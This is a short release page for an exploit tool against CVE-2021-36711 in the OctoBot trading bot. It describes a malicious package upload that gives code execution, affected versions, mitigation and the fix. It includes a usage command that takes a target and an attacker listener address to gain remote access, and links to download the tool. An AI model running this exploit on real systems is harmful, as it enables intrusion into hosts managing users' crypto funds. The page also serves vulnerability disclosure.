[CVE-2021-36711] Sashimi Evil OctoBot Tentacle

Sashimi Evil OctoBot Tentacle is a python script that exploits a vulnerability that lies in the Tentacles upload functionality of the cryptocurrency trading bot OctoBot which is designed to be easy to use and customizable. Indeed, this open source trading bot has the particularity of offering to theirs users the possibility to upload their own trading algorithms.

Sashimi Evil OctoBot Tentacle takes advantage of this feature to upload a malicious crafted package that leads to an arbitrary code execution.

Affected versions

All OctoBot versions until the latest version (0.4.0b12) are vulnerable. However, this exploit will work from version 0.4.0b3 until version 0.4.1.

Proof of concept

(PoC Tested on Octobot 0.4.0b10)

Funny isn't it?

More in depth tutorial video by @CodeMaru:

Requirement

  • Python 3 (Must already have it if you are OctoBot user :D)
  • An OctoBot target host platform.

As usual the 3 scripts presented are open source and available on GitHub at the following address:

python3 sashimi.py --RHOST TARGET_IP --RPORT TARGET_PORT --LHOST YOUR_IP --LPORT YOUR_OPEN_PORT

Be patient for around 3 min, the time to download, create and upload the malicious Tentacle package, and you should have a remote access to the machine. That’s it!

Mitigation

To protect against this attack, set a password in your OctoBot platform or add an .htpasswd.

[Update] A new version, 0.4.4, that fix the vulnerability has been released.

https://github.com/Drakkar-Software/OctoBot/issues/1966

Note

FOR EDUCATIONAL PURPOSE ONLY.

Reference

https://nvd.nist.gov/vuln/detail/CVE-2021-36711

Download

https://gitlab.com/0xSamy/Sashimi-Evil-OctoBot-Tentacle